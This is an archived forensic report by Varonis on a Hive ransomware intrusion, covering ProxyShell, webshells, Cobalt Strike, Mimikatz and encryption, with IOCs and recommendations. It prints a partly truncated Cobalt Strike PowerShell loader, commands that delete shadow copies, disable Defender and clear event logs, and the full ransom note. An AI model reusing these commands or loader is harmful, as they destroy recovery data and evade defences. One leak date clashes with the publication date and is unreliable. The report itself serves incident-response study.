{
	"id": "6c6784b3-1e52-4d11-8039-39c75c2a347c",
	"created_at": "2026-04-06T00:15:21.582381Z",
	"updated_at": "2026-04-10T13:12:33.864787Z",
	"deleted_at": null,
	"sha1_hash": "4b321b7cb2737f25e28463a39d15fa8681b1b66a",
	"title": "Hive Ransomware Analysis",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1768348,
	"plain_text": "Hive Ransomware Analysis\r\nBy Nadav Ovadia\r\nPublished: 2022-04-19 · Archived: 2026-04-05 16:43:21 UTC\r\n×\r\nName MD5 SHA1\r\nWindows.exe    \r\nMimikatz.exe 6c9ad4e67032301a61a9897377d9cff8 655979d56e874fbe7561bb1b6e512316c25cbb\r\nadvanced_port_scanner_2.5.3869.exe 6a58b52b184715583cda792b56a0a1ed 3477a173e2c1005a81d042802ab0f22cc12a4d5\r\nadvanced port scanner.exe 4fdabe571b66ceec3448939bfb3ffcd1 763499b37aacd317e7d2f512872f9ed719aacae\r\nscan.exe bb7c575e798ff5243b5014777253635d 2146f04728fe93c393a74331b76799ea8fe0269\r\np.bat 5e1575c221f8826ce55ac2696cf1cf0b ecf794599c5a813f31f0468aecd5662c5029b5c4\r\nWebshell #1 d46104947d8478030e8bcfcc74f2aef7 d1ef9f484f10d12345c41d6b9fca8ee0efa29b60\r\nWebshell #2 2401f681b4722965f82a3d8199a134ed 2aee699780f06857bb0fb9c0f73e33d1ac87a38\r\n×\r\nName MD5 SHA1\r\nWindows.exe    \r\nMimikatz.exe 6c9ad4e67032301a61a9897377d9cff8 655979d56e874fbe7561bb1b6e512316c25cbb\r\nadvanced_port_scanner_2.5.3869.exe 6a58b52b184715583cda792b56a0a1ed 3477a173e2c1005a81d042802ab0f22cc12a4d5\r\nadvanced port scanner.exe 4fdabe571b66ceec3448939bfb3ffcd1 763499b37aacd317e7d2f512872f9ed719aacae\r\nscan.exe bb7c575e798ff5243b5014777253635d 2146f04728fe93c393a74331b76799ea8fe0269\r\np.bat 5e1575c221f8826ce55ac2696cf1cf0b ecf794599c5a813f31f0468aecd5662c5029b5c4\r\nWebshell #1 d46104947d8478030e8bcfcc74f2aef7 d1ef9f484f10d12345c41d6b9fca8ee0efa29b60\r\nWebshell #2 2401f681b4722965f82a3d8199a134ed 2aee699780f06857bb0fb9c0f73e33d1ac87a38\r\n×\r\nName MD5 SHA1\r\nWindows.exe    \r\nMimikatz.exe 6c9ad4e67032301a61a9897377d9cff8 655979d56e874fbe7561bb1b6e512316c25cbb\r\nadvanced_port_scanner_2.5.3869.exe 6a58b52b184715583cda792b56a0a1ed 3477a173e2c1005a81d042802ab0f22cc12a4d5\r\nhttps://www.varonis.com/blog/hive-ransomware-analysis\r\nPage 1 of 13\n\nadvanced port scanner.exe 4fdabe571b66ceec3448939bfb3ffcd1 763499b37aacd317e7d2f512872f9ed719aacae\r\nscan.exe bb7c575e798ff5243b5014777253635d 2146f04728fe93c393a74331b76799ea8fe0269\r\np.bat 5e1575c221f8826ce55ac2696cf1cf0b ecf794599c5a813f31f0468aecd5662c5029b5c4\r\nWebshell #1 d46104947d8478030e8bcfcc74f2aef7 d1ef9f484f10d12345c41d6b9fca8ee0efa29b60\r\nWebshell #2 2401f681b4722965f82a3d8199a134ed 2aee699780f06857bb0fb9c0f73e33d1ac87a38\r\nDuring a recent engagement with a customer, the Varonis Forensics Team investigated a ransomware incident. Multiple\r\ndevices and file servers were compromised and encrypted by a malicious threat group known as Hive.\r\nFirst observed in June 2021, Hive is an affiliate-based ransomware variant used by cybercriminals to conduct ransomware\r\nattacks against healthcare facilities, nonprofits, retailers, energy providers, and other sectors worldwide. Hive is built for\r\ndistribution in a Ransomware-as-a-service model that enables affiliates to utilize it as desired.\r\nThe variant uses common ransomware tactics, techniques, and procedures (TTPs) to compromise victims' devices. While\r\ntaking live actions, the operator disables anti-malware protections and then exfiltrates sensitive data and encrypts business\r\nfiles. Their affiliates use multiple mechanisms to compromise their victims' networks, including phishing emails with\r\nmalicious attachments, leaked VPN credentials, and by exploiting vulnerabilities on external-facing assets. In addition, Hive\r\nplaces a plain-text ransom note that threatens to publish the victim's data on the TOR website 'HiveLeaks' unless the victim\r\nmeets the attacker's conditions.\r\nhttps://www.varonis.com/blog/hive-ransomware-analysis\r\nPage 2 of 13\n\nObservation of the attack\r\nThe Forensics team observed that the actor managed to achieve its malicious goals and encrypt the environment in less than\r\n72 hours from the initial compromise.\r\nStage 1: ProxyShell and WebShell\r\nFirst, the attacker exploited multiple Exchange security vulnerabilities, referred to as ProxyShell. Next, the attack placed a\r\nmalicious backdoor script, referred to as webshell, in a publicly accessible directory on the Exchange server. These web\r\nscripts could then execute malicious PowerShell code over the compromised server with SYSTEM privileges.\r\nStage 2: Cobalt Strike\r\nThe malicious PowerShell code downloaded additional stagers from a remote C2 (Command \u0026 Control) server associated\r\nwith the Cobalt Strike framework. The stagers were not written to the file system but executed in memory.\r\nStage 3: Mimikatz and Pass-The-Hash\r\nLeveraging the SYSTEM permissions, the threat actor created a new system administrator user named \"user\" and advanced\r\nto the credential dumping stage, invoking Mimikatz. By stealing the domain Administrator NTLM hash and without needing\r\nto crack the password, the operator managed to reuse it via Pass-The-Hash attack and take control of the domain admin\r\naccount.\r\nStage 4: Scanning for sensitive information\r\nNext, the threat actor performed extensive discovery activities across the network. In addition to searching for files\r\ncontaining \"password\" in their names, observed activities included dropping network scanners and collecting the networks'\r\nIP addresses and device names, followed by RDPs to the backup servers and other critical assets.\r\nStage 5: Ransomware deployment\r\nFinally, a custom-crafted malware payload named Windows.exe was delivered and executed on various devices, leading to\r\nwide encryption and denial of access to files within the organization.\r\nThe payload created a plain text ransomware demand note during the encryption phase.\r\nInitial Access\r\nThe initial indicator of compromise was the successful exploitation of Microsoft Exchange via vulnerabilities known as\r\nProxyShell.\r\nhttps://www.varonis.com/blog/hive-ransomware-analysis\r\nPage 3 of 13\n\nRevealed in August 2021, ProxyShell is a Remote Code Execution (RCE) vulnerability. ProxyShell involves a set of three\r\nseparate security flaws and allows remote attackers to execute arbitrary code on affected installations of Microsoft Exchange\r\nServer.\r\nCVE-2021-34473 (Base Score: 9.8)\r\nMicrosoft Exchange Server Remote Code Execution Vulnerability.\r\nCVE-2021-34523 (Base Score: 9.8)\r\nMicrosoft Exchange Server Elevation of Privilege Vulnerability\r\nCVE-2021-31207 (Base Score: 7.2)\r\nMicrosoft Exchange Server Security Feature Bypass Vulnerability\r\nMicrosoft released patches for those three vulnerabilities in April and May 2021 as part of their \"Patch Tuesday\" releases.\r\nCVE-2021-34473 and CVE-2021-34523 were patched (KB5001779) In April 2021. CVE-2021-31207 was patched\r\n(KB5003435) in May.\r\nDuring the investigation, we found specific exploitation evidence of these CVEs (Common Vulnerabilities and Exposures),\r\nwhich allowed the adversary to deploy webshells successfully on the compromised server.\r\n×\r\nBased on our analysis, four different IP addresses accessed the malicious files:\r\n139.60.161.228 (USA)\r\nASN: HOSTKEY\r\nRELATED ACTIVITY: Cobalt Strike C2 and Log4j vulnerability scanning\r\n139.60.161.56 (USA)\r\nASN: HOSTKEY\r\nRELATED ACTIVITY: Cobalt Strike C2 and Log4j vulnerability scanning\r\n185.70.184.8 (Netherlands)\r\nASN: HOSTKEY\r\nRELATED ACTIVITY: Cobalt Strike C2 and Log4j vulnerability scanning. Associated with Emotet, IcedID, and QBot.\r\n91.208.52.149 (Netherlands)\r\nASN: SERVERIUS-A\r\nThe following malicious files were spotted:\r\n×These file names are made of random characters that do not appear to have any significance. Attackers commonly use this\r\ntechnique to prevent third parties from finding the webshells online by sending HTTP requests to a list of preconstructed\r\nhttps://www.varonis.com/blog/hive-ransomware-analysis\r\nPage 4 of 13\n\nnames that are part of other campaigns.\r\nThese file names are made of random characters that do not appear to have any significance. Attackers commonly use this\r\ntechnique to prevent third parties from finding the webshells online by sending HTTP requests to a list of preconstructed\r\nnames that are part of other campaigns.\r\n×\r\nThe source code of the established webshells is taken from a public git repository at\r\nhttps://github.com/ThePacketBender/webshells.\r\nhttps://www.varonis.com/blog/hive-ransomware-analysis\r\nPage 5 of 13\n\nExecution\r\nBy establishing a foothold on the compromised Exchange Server, the threat actor executed various PowerShell commands\r\ndesigned to download malicious files from the remote C2 server to the victim's computer. Attackers would execute the\r\nmalware by using commands such as Invoke-Expression (IEX) or by downloading the file content directly into the device's\r\nmemory and executing it:\r\n×Further, attackers executed an additional obfuscated PowerShell script that was a part of the Cobalt Strike framework:\r\nFurther, attackers executed an additional obfuscated PowerShell script that was a part of the Cobalt Strike framework:\r\n×The Base64 encoded command contains several layers of encoding but finally decodes to the following PowerShell\r\ncommand:\r\nThe Base64 encoded command contains several layers of encoding but finally decodes to the following PowerShell\r\ncommand:\r\nfunction func_get_proc_address {\r\nParam ($var_module, $var_procedure)\r\n$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache\r\n$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.Hand\r\nreturn $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServi\r\n}\r\nfunction func_get_delegate_type {\r\nParam (\r\n[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,\r\n[Parameter(Position = 1)] [Type] $var_return_type = [Void]\r\n)\r\n$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('\r\n$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::S\r\n$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters\r\nreturn $var_type_builder.CreateType()\r\n}\r\n[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qH\r\nfor ($x = 0; $x -lt $var_code.Count; $x++) {\r\n$var_code[$x] = $var_code[$x] -bxor 35\r\nhttps://www.varonis.com/blog/hive-ransomware-analysis\r\nPage 6 of 13\n\n}\r\nWrite-Output $var_code\r\nThe additional \"for loop\" function adds another layer of obfuscation and XORs the Base64 code with a key of 35. We\r\nsuccessfully extracted the IP address of the target C2 by mimicking the process, which, unsurprisingly, turned out to be the\r\nsame address we found previously.\r\n×\r\nConverting the Base64 into a hexadecimal string and reformatting with a Python script restored the malicious file.\r\nVirusTotal analysis shows 23 out of 52 antivirus detections and attributes the file to the Cobalt Strike framework.\r\n×\r\nPersistence\r\nhttps://www.varonis.com/blog/hive-ransomware-analysis\r\nPage 7 of 13\n\nWith the provided NT AUTHORITY\\SYSTEM privileges and to maintain persistence over the compromised server, a newly\r\ncrafted account followed by the name \"user\" was created and added to \"Remote Desktop Users\" and \"Administrators\"\r\ngroups. The user was used to access multiple paths seeking \"password\" related files, RDP access to backup servers, and\r\nmore.\r\nCredential Access\r\nThe threat actor used Mimikatz, a post-exploitation tool, specifically its SekurLSA's \"logonPasswords\" module, which\r\nextracts the passwords and NTLM hashes of the accounts logged into the system and saves the results to a text file on the\r\nlocal system. With the administrator's NTLM hash in hand, the threat actor used the pass-the-hash technique to get highly\r\nprivileged access to other assets in the network by launching a new command prompt on the affected system:\r\n×\r\nLateral Movement\r\nLeveraging the stolen domain admin account, the actor performed RDP access requests using mstsc.exe following the\r\nparameter \"/v\" to multiple devices on the network, mainly searching for servers associated with the network backups and\r\nSQL servers. We strongly believe that these actions were performed to confirm the ability to access the critical servers\r\nbefore the ransomware deployment.\r\nDiscovery\r\nA known public network scanner tool named \"SoftPerfect\" was used to perform scans over the domain assets.\r\n×By utilizing the tool, the threat actor acquired the domain devices list and saved the results to a text file named\r\n\"domains.txt.\" To locate all live hosts, the attacker executed a Batch script called \"p.bat,\" which looped over the domains list\r\nsending pings and saved the results to a text file named \"res.txt.\"\r\nhttps://www.varonis.com/blog/hive-ransomware-analysis\r\nPage 8 of 13\n\nBy utilizing the tool, the threat actor acquired the domain devices list and saved the results to a text file named\r\n\"domains.txt.\" To locate all live hosts, the attacker executed a Batch script called \"p.bat,\" which looped over the domains list\r\nsending pings and saved the results to a text file named \"res.txt.\"\r\n×\r\n×\r\nThe p.bat script and file naming convention match part of Conti's ransomware toolkit, which was provided to the group's\r\naffiliates and first leaked on August 21, 2022 and published on Twitter. This indicates that Hive affiliates are adopting other\r\nransomware group techniques.\r\nhttps://www.varonis.com/blog/hive-ransomware-analysis\r\nPage 9 of 13\n\nImpact\r\nThe threat actors began their final actions by distributing a file named \"windows.exe,\" which was the ransomware payload\r\nwritten in Golang. The payload performs multiple operations, including deleting shadow copies, disabling security products,\r\nclearing Windows event logs, and closing handles on files to guarantee a smooth encryption process. Below is a brief\r\ndocumentation of the executed commands:\r\nCommand Description\r\nvssadmin.exe delete shadows /all /quiet\r\nDeleting the shadow copies from the\r\nmachine to inhibit system recovery\r\nnet.exe stop \"SamSs\" /y\r\nStops the Security Accounts Manager\r\nto prevent sending alerts to SIEM\r\nsystem\r\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v\r\n\"DisableAntiSpyware\" /t REG_DWORD /d \"1\" /f\r\nDisables Windows Defender to avoid\r\ndetection\r\nwevtutil.exe cl security\r\nClearing the Windows Security Event\r\nLogs\r\nThe ransomware iterates through all the available folders encrypting the included files and drops a ransom note named\r\n\"_HOW_TO_DECRYPT.txt\" in each folder. Once it has finished encryption, it pops the ransom note to inform the user of\r\nthe attack.\r\nYour network has been breached and all data were encrypted.\r\nPersonal data, financial reports and important documents are ready to disclose.\r\nTo decrypt all the data and to prevent exfiltrated files to be disclosed at\r\nhttp://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/\r\nyou will need to purchase our decryption software.\r\nPlease contact our sales department at:\r\n http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/\r\n \r\n Login:\r\n Password:\r\nTo get an access to .onion websites download and install Tor Browser at:\r\n https://www.torproject.org/ (Tor Browser is not related to us)\r\nFollow the guidelines below to avoid losing your data:\r\n - Do not modify, rename or delete *.key. files. Your data will be\r\n undecryptable.\r\n - Do not modify or rename encrypted files. You will lose them.\r\n - Do not report to the Police, FBI, etc. They don't care about your business.\r\n They simply won't allow you to pay. As a result you will lose everything.\r\n - Do not hire a recovery company. They can't decrypt without the key.\r\nhttps://www.varonis.com/blog/hive-ransomware-analysis\r\nPage 10 of 13\n\nThey also don't care about your business. They believe that they are\r\n good negotiators, but it is not. They usually fail. So speak for yourself.\r\n - Do not reject to purchase. Exfiltrated files will be publicly disclosed.\r\nConclusions\r\nRansomware attacks have grown significantly over the past years and remain the preferred method of threat actors aiming to\r\nmaximize profits. The impact of an attack can be detrimental. It may potentially harm an organization's reputation, disrupt\r\nregular operations and lead to temporary, and possibly permanent, loss of sensitive data.\r\nAlthough detecting and responding to such incidents can be challenging, most malicious activities can be prevented by\r\nhaving the right security tools, incident response plans, and patches for known vulnerabilities in place.\r\nRecommendations\r\nVaronis Forensics Team recommends the following:\r\nPatch Exchange server to the latest Exchange Cumulative Update (CU) and Security Update (SU) provided by\r\nMicrosoft.\r\nEnforce the use of complex passwords and require users to change passwords periodically.\r\nUse the Microsoft LAPS solution to revoke local admin permissions from domain accounts (the principle of least\r\nprivilege) and regularly check for and remove inactive user accounts.\r\nBlock SMBv1 usage and use SMB signing to protect against pass-the-hash attack.\r\nRestrict access to the minimum required for the employee's role.\r\nDetect and automatically prevent access control changes that violate your business rules.\r\nTrain employees in security principles and make sure employees receive security awareness training as a part of your\r\ncyber security plans.\r\nEstablish basic security practices, and set rules of behavior describing how to handle and protect the organization and\r\ncustomer information and other vital data.\r\nMITRE Breakdown\r\n1. Initial Access\r\nExploit Public-Facing Application (T1190)\r\nCVE-2021-34473\r\nCVE-2021-34523\r\nCVE-2021-31207\r\n2. Execution\r\nUser Execution (T1204)\r\nMalicious File (T1204.002)\r\nCommand and Scripting Interpreter (T1059)\r\nPowerShell (T1059.001)\r\n3. Persistence\r\nCreate Account (T1136)\r\nhttps://www.varonis.com/blog/hive-ransomware-analysis\r\nPage 11 of 13\n\nDomain Account (T1136.002)\r\nValid Accounts (T1078)\r\nDomain Accounts (T1078.002)\r\n4. Privilege Escalation\r\nValid Accounts (T1078)\r\nDomain Accounts (T1078.002)\r\n5. Defense Evasion\r\nDeobfuscate/Decode Files or Information (T1140)\r\nIndicator Removal on Host (T1070)\r\nClear Windows Event Logs (T1070.001)\r\n6. Credential Access\r\nOS Credential Dumping (T1003)\r\nCached Domain Credentials (T1003.005)\r\n7. Discovery\r\nRemote System Discovery (T1018)\r\n8. Lateral Movement\r\nRemote Services (T1021)\r\nRemote Desktop Protocol (T1021.001)\r\n9. Command and Control\r\nApplication Layer Protocol (T1071)\r\nWeb Protocols (T1071.001)\r\n10. Impact\r\nData Encrypted for Impact (T1486)\r\nIOC's\r\nUser accounts names created\r\n\"user\"\r\nMalicious IP's\r\n139.60.161.228\r\n139.60.161.56\r\n91.208.52.149\r\n185.70.184.8\r\nName MD5 SHA1\r\nhttps://www.varonis.com/blog/hive-ransomware-analysis\r\nPage 12 of 13\n\nWindows.exe    \r\nMimikatz.exe 6c9ad4e67032301a61a9897377d9cff8 655979d56e874fbe7561bb1b6e512316c25cbb\r\nadvanced_port_scanner_2.5.3869.exe 6a58b52b184715583cda792b56a0a1ed 3477a173e2c1005a81d042802ab0f22cc12a4d5\r\nadvanced port scanner.exe 4fdabe571b66ceec3448939bfb3ffcd1 763499b37aacd317e7d2f512872f9ed719aacae\r\nscan.exe bb7c575e798ff5243b5014777253635d 2146f04728fe93c393a74331b76799ea8fe0269\r\np.bat 5e1575c221f8826ce55ac2696cf1cf0b ecf794599c5a813f31f0468aecd5662c5029b5c4\r\nWebshell #1 d46104947d8478030e8bcfcc74f2aef7 d1ef9f484f10d12345c41d6b9fca8ee0efa29b60\r\nWebshell #2 2401f681b4722965f82a3d8199a134ed 2aee699780f06857bb0fb9c0f73e33d1ac87a38\r\nSource: https://www.varonis.com/blog/hive-ransomware-analysis\r\nhttps://www.varonis.com/blog/hive-ransomware-analysis\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.varonis.com/blog/hive-ransomware-analysis"
	],
	"report_names": [
		"hive-ransomware-analysis"
	],
	"threat_actors": [],
	"ts_created_at": 1775434521,
	"ts_updated_at": 1775826753,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4b321b7cb2737f25e28463a39d15fa8681b1b66a.pdf",
		"text": "https://archive.orkl.eu/4b321b7cb2737f25e28463a39d15fa8681b1b66a.txt",
		"img": "https://archive.orkl.eu/4b321b7cb2737f25e28463a39d15fa8681b1b66a.jpg"
	}
}